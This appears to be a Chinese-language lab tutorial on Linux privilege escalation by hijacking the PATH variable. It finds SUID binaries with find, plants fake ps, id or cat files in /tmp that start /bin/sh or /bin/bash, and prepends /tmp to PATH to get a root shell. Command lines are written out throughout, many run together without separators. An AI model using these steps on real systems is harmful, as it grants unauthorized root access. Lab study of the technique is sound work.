在這篇文章中，我將會為大家介紹一些使用環境變量進行Linux提權的方法，包括在CTF challenges中使用到一些的技術。話不多說，讓我們進入正題！

介紹

PATH是Linux和類Unix操作系統中的環境變量，它指定存儲可執行程序的所有bin和sbin目錄。當用戶在終端上執行任何命令時，它會通過PATH變量來響應用戶執行的命令，并向shell發送請求以搜索可執行文件。超級用戶通常還具有/sbin和/usr/sbin條目，以便于系統管理命令的執行。

使用echo命令顯示當前PATH環境變量： 

echo $PATH  
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games 

如果你在PATH變量中看到‘.’，則意味著登錄用戶可以從當前目錄執行二進制文件/腳本，這對于攻擊者而言也是一個提權的絕好機會。這里之所以沒有指定程序的完整路徑，往往是因為編寫程序時的疏忽造成的。

方法1

Ubuntu LAB SET_UP

當前，我們位于/home/raj目錄，我們將在其中創建一個名為/script的新目錄。在script目錄下，我們將編寫一個小型的c程序來調用系統二進制文件的函數。

pwdmkdir scriptcd /scriptnano demo.c 

 

正如你在demo.c文件中看到的，我們正在調用ps命令。

 

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。 

lsgcc demo.c -o shellchmod u+s shellls -la shell 

 

受害者VM機器

假設我們已經成功滲透目標，并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令，搜索具有SUID或4000權限的文件。 

find / -perm -u=s -type f 2>/dev/null 

通過上述命令，攻擊者可以枚舉出目標系統上所有的可執行文件，這里可以看到/home/raj/script/shell具有SUID權限。

 

進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“shell”文件，我們運行這個文件。 

/home/raj/script 

 

Echo命令 

cd /tmpecho “/bin/sh” > pschmod 777 psecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shellwhoami 

 

Copy命令 

cd /home/raj/script/cp /bin/sh /tmp/psecho $PATHexport PATH=/tmp:$PATH./shellwhoami 

 

Symlink命令 

ln -s /bin/sh psexport PATH=.:$PATH./shellidwhoami 

注意：符號鏈接也叫軟鏈接，如果目錄具有完全權限，則它將成功運行。在Ubuntu中symlink情況下，我們已經賦予了/script目錄777的權限。

因此，攻擊者可以操縱環境變量PATH來進行提權，并獲得root訪問權限。

 

方法2

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境，現在在腳本目錄中，我們將編寫一個小型的c程序來調用系統二進制文件的函數。 

pwdmkdir scriptcd /scriptnano demo.c 

正如你在demo.c文件中看到的，我們正在調用id命令。

 

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。 

lsgcc demo.c -o shell2chmod u+s shell2ls -la shell2 

 

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段。我們通過ssh成功登錄到了受害者的機器。然后使用Find命令，搜索具有SUID或4000權限的文件。在這里，我們可以看到/home/raj/script/shell2具有SUID權限。 

find / -perm -u=s -type f 2>/dev/null 

進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“shell2”文件，我們運行這個文件。 

cd /home/raj/scriptls./shell2 

 

Echo命令 

cd /tmpecho “/bin/sh” > idchmod 777 idecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./shell2whoami 

 

方法3

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的，我們正在調用cat命令從etc/passwd文件中讀取內容。

 

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。 

lsgcc demo.c -o rajchmod u+s rajls -la raj 

 

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段，通過執行以下命令查看sudo用戶列表。 

find / -perm -u=s -type f 2>/dev/null 

在這里，我們可以看到/home/raj/script/raj具有SUID權限，進入到home/raj/script/目錄，可以看到該目錄下有一個可執行的“raj”文件。所以當我們運行這個文件時，它會把etc/passwd文件作為輸出結果。 

cd /home/raj/script/ls./raj 

 

Nano**編輯器** 

cd /tmpnano cat 

現在，當終端打開時輸入/bin/bash并保存。

 

 

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./rajwhoami 

 

方法4

Ubuntu LAB SET_UP

重復上述步驟配置你的實驗環境。正如你在demo.c文件中看到的，我們正在調用cat命令讀取/home/raj中的msg.txt中的內容，但/home/raj中并沒有這樣的文件。

 

然后使用gcc編譯demo.c文件，并提升編譯文件的SUID權限。 

lsgcc demo.c -o ignitechmod u+s ignitels -la ignite 

 

受害者VM機器

同樣，假設我們已經成功滲透目標，并進入提權階段，通過執行以下命令查看sudo用戶列表 

find / -perm -u=s -type f 2>/dev/null 

在這里，我們可以看到/home/raj/script/ignite具有SUID權限，進入到/home/raj/script目錄，可以看到該目錄下有一個可執行的“ignite”文件。所以當我們運行這個文件時，它會報錯“cat: /home/raj/msg.txt”文件或目錄不存在。 

cd /home/raj/scriptls./ignite 

 

Vi編輯器 

cd /tmpvi cat 

現在，當終端打開時輸入/bin/bash并保存。

 

 

chmod 777 catls -al catecho $PATHexport PATH=/tmp:$PATHcd /home/raj/script./ignitewhoami 

 

原文鏈接：http://www.freebuf.com/articles/system/173903.html